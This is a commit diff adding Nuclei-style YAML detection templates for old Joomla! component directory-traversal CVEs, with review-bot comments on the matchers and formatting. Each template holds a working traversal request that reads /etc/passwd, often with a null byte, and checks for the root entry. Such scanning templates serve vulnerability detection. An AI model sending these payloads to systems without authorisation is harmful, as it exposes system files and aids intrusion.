Update 8.4.9

main
daffainfo 2021-09-02 15:03:02 +07:00
parent c6dbad9e02
commit 2937fc272b
103 changed files with 1242 additions and 74 deletions

27
CVE-2008-4668.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2008-4668
info:
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/6618
- https://www.cvedetails.com/cve/CVE-2008-4668
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
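Review bot: The `regex` matcher `root:.*:0:0` is looser than it needs to be: `.*` is unbounded and there is no trailing `:` after the gid, so any 200 response containing `root:` followed later on the same line by `:0:0` satisfies it. A pattern such as `root:[^:]*:0:0:` pins the match to the passwd field layout. The same matcher is repeated in every new template in this commit, so the change is worth making across all of them.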

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference: | reference:
- https://www.exploit-db.com/exploits/5435 - https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764 - https://www.cvedetails.com/cve/CVE-2008-4764
tags: cve,cve2008,joomla,lfi tags: cve,cve2008,joomla,lfi
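Review bot: On the `reference` line the literal block scalar (`reference: |`) becomes a plain key, so the two URLs are now parsed as a YAML sequence instead of one multi-line string. That matches the form used by the templates added in this commit, but the commit message ("Update 8.4.9") does not say that existing templates change format. A line in the message stating it would help anyone tracing a parsing difference back to this commit.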

27
CVE-2008-6172.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2008-6172
info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
reference:
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference: | reference:
- https://www.exploit-db.com/exploits/36994 - https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114 - https://www.cvedetails.com/cve/CVE-2009-5114
tags: cve,cve2009,lfi tags: cve,cve2009,lfi

27
CVE-2010-0943.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-0943
info:
name: Joomla! Component com_jashowcase - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
reference:
- https://www.exploit-db.com/exploits/11090
- https://www.cvedetails.com/cve/CVE-2010-0943
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/11088 - https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944 - https://www.cvedetails.com/cve/CVE-2010-0944
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi

27
CVE-2010-0985.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-0985
info:
name: Joomla! Component com_abbrev - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Abbreviations Manager (com_abbrev) component 1.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/10948
- https://www.cvedetails.com/cve/CVE-2010-0985
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

26
CVE-2010-1219.yaml Normal file

@ -0,0 +1,26 @@
id: CVE-2010-1219
info:
name: Joomla! Component com_janews - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA News (com_janews) component 1.0 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11757
- https://www.cvedetails.com/cve/CVE-2010-1219
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1304.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1304
info:
name: Joomla! Component User Status - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in userstatus.php in the User Status (com_userstatus) component 1.21.16 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1305.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1305
info:
name: Joomla! Component JInventory 1.23.02 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in jinventory.php in the JInventory (com_jinventory) component 1.23.02 and possibly other versions before 1.26.03, a module for Joomla!, allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12065
- https://www.cvedetails.com/cve/CVE-2010-1305
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1306.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1306
info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1314.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1314
info:
name: Joomla! Component Highslide 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Highslide JS (com_hsconfig) component 1.5 and 2.0.9 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12086
- https://www.cvedetails.com/cve/CVE-2010-1314
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1345.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1345
info:
name: Joomla! Component Cookex Agency CKForms - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms) component 1.3.3 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/15453
- https://www.cvedetails.com/cve/CVE-2010-1345
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1353.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1353
info:
name: Joomla! Component LoginBox - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12068
- https://www.cvedetails.com/cve/CVE-2010-1353
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1354.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1354
info:
name: Joomla! Component VJDEO 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the VJDEO (com_vjdeo) component 1.0 and 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12102
- https://www.cvedetails.com/cve/CVE-2010-1354
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1471.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1471
info:
name: Joomla! Component Address Book 1.5.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AddressBook (com_addressbook) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12170
- https://www.cvedetails.com/cve/CVE-2010-1471
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1474.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1474
info:
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12182
- https://www.cvedetails.com/cve/CVE-2010-1474
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1475.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1475
info:
name: Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12147
- https://www.cvedetails.com/cve/CVE-2010-1475
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
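Review bot: The `path` value has a doubled equals sign, `controller==../`, so the parameter value sent to the server starts with `=..` rather than `..`. Every other template in this commit uses `controller=../`, and with the stray `=` the probe is unlikely to behave as intended, which means a vulnerable host can be reported clean. Drop the extra `=`.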

27
CVE-2010-1494.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1494
info:
name: Joomla! Component AWDwall 1.5.4 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the AWDwall (com_awdwall) component 1.5.4 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12113
- https://www.cvedetails.com/cve/CVE-2010-1494
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1495.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1495
info:
name: Joomla! Component Matamko 1.01 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12286
- https://www.cvedetails.com/cve/CVE-2010-1495
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1532.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1532
info:
name: Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail) component 1.5.3 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12118
- https://www.cvedetails.com/cve/CVE-2010-1532
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1533.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1533
info:
name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12142
- https://www.cvedetails.com/cve/CVE-2010-1533
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1535.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1535
info:
name: Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the TRAVELbook (com_travelbook) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12151
- https://www.cvedetails.com/cve/CVE-2010-1535
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1601.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1601
info:
name: Joomla! Component JA Comment - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Comment (com_jacomment) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12236
- https://www.cvedetails.com/cve/CVE-2010-1601
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1602.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1602
info:
name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12283
- https://www.cvedetails.com/cve/CVE-2010-1602
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1657.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1657
info:
name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12428
- https://www.cvedetails.com/cve/CVE-2010-1657
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1659.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1659
info:
name: Joomla! Component Ultimate Portfolio 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Ultimate Portfolio (com_ultimateportfolio) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12426
- https://www.cvedetails.com/cve/CVE-2010-1659
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1714.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1714
info:
name: Joomla! Component Arcade Games 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Arcade Games (com_arcadegames) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12168
- https://www.cvedetails.com/cve/CVE-2010-1714
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1717.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1717
info:
name: Joomla! Component iF surfALERT 1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iF surfALERT (com_if_surfalert) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12291
- https://www.cvedetails.com/cve/CVE-2010-1717
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1718.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1718
info:
name: Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in archeryscores.php in the Archery Scores (com_archeryscores) component 1.0.6 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12282
- https://www.cvedetails.com/cve/CVE-2010-1718
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1722.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1722
info:
name: Joomla! Component Online Market 2.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12177
- https://www.cvedetails.com/cve/CVE-2010-1722
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1875.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1875
info:
name: Joomla! Component Property - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/11851
- https://www.cvedetails.com/cve/CVE-2010-1875
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1953.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1953
info:
name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12288
- https://www.cvedetails.com/cve/CVE-2010-1953
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1954.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1954
info:
name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12287
- https://www.cvedetails.com/cve/CVE-2010-1954
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
CVE-2010-1955.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1955
info:
name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12238
- https://www.cvedetails.com/cve/CVE-2010-1955
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: | reference:
- https://www.exploit-db.com/exploits/12088 - https://www.exploit-db.com/exploits/12088
- https://www.cvedetails.com/cve/CVE-2010-1979 - https://www.cvedetails.com/cve/CVE-2010-1979
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi

27
CVE-2010-1980.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1980
info:
name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12085
- https://www.cvedetails.com/cve/CVE-2010-1980
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
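Review bot: The `name` field gives the version as "Flickr 1.0" while the `description` says the affected component is 1.0.3, and the name also repeats "Joomla!" ("Joomla! Component Joomla! Flickr"). Align the name with the description, for example "Joomla! Component Joomla Flickr 1.0.3 - Local File Inclusion", so results filtered by name show the affected version.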

27
CVE-2010-1981.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-1981
info:
name: Joomla! Component Fabrik 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12087
- https://www.cvedetails.com/cve/CVE-2010-1981
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

@ -5,7 +5,7 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
reference: | reference:
- https://www.exploit-db.com/exploits/12055 - https://www.exploit-db.com/exploits/12055
- https://www.cvedetails.com/cve/CVE-2010-1983 - https://www.cvedetails.com/cve/CVE-2010-1983
tags: cve,cve2010,joomla,lfi tags: cve,cve2010,joomla,lfi

27
CVE-2010-2033.yaml Normal file

@ -0,0 +1,27 @@
id: CVE-2010-2033
info:
name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
- https://www.cvedetails.com/cve/CVE-2010-2033
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
